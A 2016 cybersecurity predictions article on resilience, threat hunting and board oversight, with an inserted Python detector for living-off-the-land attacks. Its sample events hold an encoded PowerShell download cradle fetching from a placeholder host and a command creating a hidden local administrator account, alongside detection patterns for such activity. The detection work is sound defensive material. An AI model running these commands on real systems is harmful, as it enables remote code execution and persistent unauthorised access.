2015 was the year of hard truths. The notion of a "magic bullet" that prevents cyber-attacks outright became dangerously idealistic. We saw high-profile breaches touching nearly every industry, leaving many organizations more concerned about their own state of vulnerability. The "Internet of Things" brought consumers innumerable new conveniences, in their homes, cars, toys and even their medical devices, but it added another layer of risk for the producers of that connectivity. The common refrain, "it's when, not if, you'll be hacked," became accepted fact. Organizational leadership started to understand that the technological arms race between attackers and defenders is a series of battles in a chronic war, with no rest in sight for the battle-weary.
These realizations may sound bleak. But the resulting urgency for an effective cyber defense has brought a refreshingly realistic outlook to the fore. Organizations are now beginning to strive for cyber resilience instead of invincibility, knowing they can persevere in the face of compromise. The mantra for 2016 is optimizing your security posture: understanding and prioritizing a company's unique set of risks, acknowledging vulnerabilities where they exist, and mitigating those risks once they are identified.
To this end, I’ve compiled a short list of trends every organization should be aware of this year:
- Malware and malware-less attacks will continue to thwart traditional detection tactics. You don't know what you don't know. Truer words were never spoken. Last year showed that sophisticated attackers have evolved their techniques, with many no longer deploying malware at all to move laterally through your network undetected and exfiltrate data. This year they will continue to refine their malware and will also lean on legitimate tools already present on your systems, such as PowerShell scripts and Microsoft diagnostic and administration utilities. Because no malicious binary is dropped, signature-based malware detection has nothing to match against, which makes those ubiquitous tools largely ineffective against this type of intrusion. Not surprisingly, detection then depends on responders who know where to look and what to look for: deep dives into network and host telemetry that reveal the tell-tale patterns of anomalous activity, for example a legitimate tool launched by an unusual parent process, at an unusual time, or with unusual arguments.
- Resilience-minded companies will proactively go on the hunt. Resilient organizations cannot afford to wait to be notified of a breach of their own systems, and this year those most aware of their risk posture will begin investing in the proactive hunt for their adversaries. These "attack trackers" (internal or external experts) will know where to look for intruders in the dark corners of a network and will be able to recognize the subtle signs of compromise, industry by industry, whether malware is present or not.
- Boards' expectations of CIO/CISO performance will require admitting vulnerability. In 2015 boards grew uneasy with the "too rosy" security picture their CISO was painting, and as a result they brought in third parties to conduct independent assessments. In 2016, boards will continue to push IT leadership to tell the full truth about risk, even if that means admitting vulnerabilities and managing down the expectation of invincibility. Boards will also continue their quest for knowledge so that they are well informed and comfortable making cyber risk decisions in the new year. This can include appointing specialist non-executive cyber directors and forming dedicated cyber risk committees (similar to audit committees) with independent subject-matter experts as advisors. Regulators are also getting in on the action: legislation already introduced in the U.S. Senate would, if passed, require public companies to disclose the cyber expertise on their boards.
- By customer demand, threat intelligence gets more intelligent. Two to three years ago, businesses were clamoring for more threat information. By 2015 they had too much of it, with too many alerts streaming in from their collection of information-sharing arrangements and threat intelligence services, rendering the alerts themselves useless. They were also bogged down with too many vendors selling low-value feeds. 2016 will be the year of contextualized, risk-based threat information that is meaningful and actionable.
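The first trend above, attackers moving with tools that are already on the box, is the one a defender can act on directly. The block below is an added example, not the article's own tooling: a small Python detector run over constructed process-creation events (the field names are an assumption, loosely modelled on the parent process, new process and command line recorded by Windows Security event 4688) that flags the patterns a hunter looks for when no malware is present. It catches an Office application spawning a script host, PowerShell launched with hidden/no-profile flags and an encoded command (which it decodes from UTF-16LE base64 to see the download cradle inside), a shell spawned by the WMI provider host, and a local administrator being added from the command line. Hostnames, paths and the example.invalid URL are made up.

```python
"""Added example: hunting for "living off the land" activity in process-creation events.

The events below are constructed for illustration, not captured from a real host, and
their field names (host, parent, image, cmdline) are an assumption modelled loosely on
Windows Security event 4688. None of this is the article's own tooling.
"""
import base64
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
LOLBIN_PARENTS = {"wmiprvse.exe"}  # WMI provider host: remote WMI execution lands here

# -EncodedCommand and the abbreviations powershell.exe accepts, then the base64 payload.
ENC_RE = re.compile(r"-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SUSPICIOUS_PS_FLAGS = re.compile(
    r"-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|"
    r"ep\s+bypass|executionpolicy\s+bypass)", re.IGNORECASE)
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                  "frombase64string", "invoke-webrequest", "start-bitstransfer")
ADMIN_ADD_RE = re.compile(r"net1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add",
                          re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def encode_ps(cmd: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects: UTF-16LE, base64."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand payload, None if absent, or a marker if
    the payload cannot be decoded (attackers sometimes mangle it to break naive parsers)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def analyze_event(ev: dict) -> list:
    findings = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(Finding(ev["host"], "office_spawns_script_host", f"{parent} -> {image}"))
    if parent in LOLBIN_PARENTS and image in SCRIPT_HOSTS:
        findings.append(Finding(ev["host"], "wmi_spawned_shell", f"{parent} -> {image}"))
    if image in ("powershell.exe", "pwsh.exe"):
        if SUSPICIOUS_PS_FLAGS.search(cmd):
            findings.append(Finding(ev["host"], "suspicious_powershell_flags", cmd[:60]))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            low = decoded.lower()
            rule = "encoded_download_cradle" if any(k in low for k in CRADLE_MARKERS) else "encoded_command"
            findings.append(Finding(ev["host"], rule, decoded))
    if ADMIN_ADD_RE.search(cmd):
        findings.append(Finding(ev["host"], "local_admin_added", cmd))
    return findings


def analyze(events) -> list:
    return [f for ev in events for f in analyze_event(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed; benign admin script, then three suspicious launches
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"host": "ws01", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": PS, "cmdline": "powershell.exe -NoP -W Hidden -Enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")},
    {"host": "srv02", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": "wmiprvse.exe -secured -Embedding"},
    {"host": "srv02", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "net user helpdesk P@ss /add && net localgroup administrators helpdesk /add"'},
    {"host": "ws03", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe", "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.host:6} {f.rule:28} {f.detail}")
```

None of the flagged events contains a file a malware scanner would object to; every binary involved ships with Windows or Office. What gives them away is context: who launched the process, with what arguments, and what the decoded command actually does. That is the telemetry (process creation with command lines, PowerShell script block logging) a hunt team needs to be collecting before it can look for these patterns.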
These are just a handful of the need-to-know trends that IT professionals, from CIOs and CISOs to everyone in between, must weigh when considering their cyber resilience posture in 2016. But perhaps the shift toward a resilience mindset, and the action that follows from it, is the greatest trend we can expect next year. After all, winning a battle in the chronic cyber war requires not only a good defense but the best possible offense.
An interactive infographic of our 2016 Cyber Predictions covers the top six trends expected to make an impact within the next 12 months.